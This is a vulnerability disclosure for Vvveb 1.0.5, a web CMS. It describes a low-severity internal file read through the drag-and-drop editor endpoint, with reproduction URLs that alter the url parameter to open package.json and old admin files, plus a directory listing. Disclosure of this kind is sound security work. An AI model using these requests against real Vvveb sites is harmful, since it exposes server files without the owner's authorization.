Vvveb 1.0.5 | Internal file read via drag-and-drop editor
Information
| Software Type | Web App |
|---|---|
| Software Name | Vvveb |
| Affected Version | 1.0.5 |
| Software Vendor | Vvveb |
| Software Link | https://github.com/givanz/Vvveb |
| Severity | Low |
| CVSS Score | 3.5 |
| CVE Link | Pending |
| Affected Assets | 163+ |
| Date of Discovery | Jan 3rd, 2025 |
| PoC Exploit | N/A |
Description
The endpoint at [/vadmin123/index.php?module=editor/editor&url=/&template=index.html] is vulnerable to file read. The vulnerability allows you to read old Vvveb files that were previously being used by an older Vvveb version.
Its current severity is low because I wasn't able to read sensitive files.
Reproduce
Login as an editor or any user with access to “Edit website” functionality. Open the following endpoint:
http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=/&template=index.html
Change the path to this:
http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=index.html
This will allow you to open files located at the following server path:/var/www/html/public/admin/default
I found this file by searching for a keyword I had found on index.html [editor/editor&url=index.html]:find . -type f -exec grep -l 'Vvveb 0.2 is now available!' {} +
This directly contains the following files:
/var/www/html/public/admin/default # ls -la
total 448
drwx-wx-wx 22 www-data www-data 4096 Jan 3 14:56 .
drwx-wx-wx 3 www-data www-data 4096 Jan 3 14:57 ..
-rwx-wx-wx 1 www-data www-data 10173 Jan 3 14:56 LICENSE
-rwx-wx-wx 1 www-data www-data 5378 Jan 3 14:56 README.md
drwx-wx-wx 2 www-data www-data 4096 Jan 3 14:56 admin
drwx-wx-wx 3 www-data www-data 4096 Jan 3 14:56 content
drwx-wx-wx 2 www-data www-data 4096 Jan 3 14:56 css
drwx-wx-wx 2 www-data www-data 4096 Jan 3 14:56 editor
drwx-wx-wx 4 www-data www-data 4096 Jan 3 14:56 email
-rwx-wx-wx 1 www-data www-data 73835 Jan 3 14:56 error403.html
-rwx-wx-wx 1 www-data www-data 73408 Jan 3 14:56 error404.html
-rwx-wx-wx 1 www-data www-data 74142 Jan 3 14:56 error500.html
-rwx-wx-wx 1 www-data www-data 3150 Jan 3 14:56 favicon.ico
drwx-wx-wx 2 www-data www-data 4096 Jan 3 14:56 field
drwx-wx-wx 2 www-data www-data 4096 Jan 3 14:56 fields
You can open files for reading. I was able to read package.json:
http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=package.json
Some old files like systeminfo.html may provide information about old configuration used by the web app:
http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=tools/systeminfo.html
Proof of Concept (PoC) Video
Posted on: January 10, 2025 11:22 PM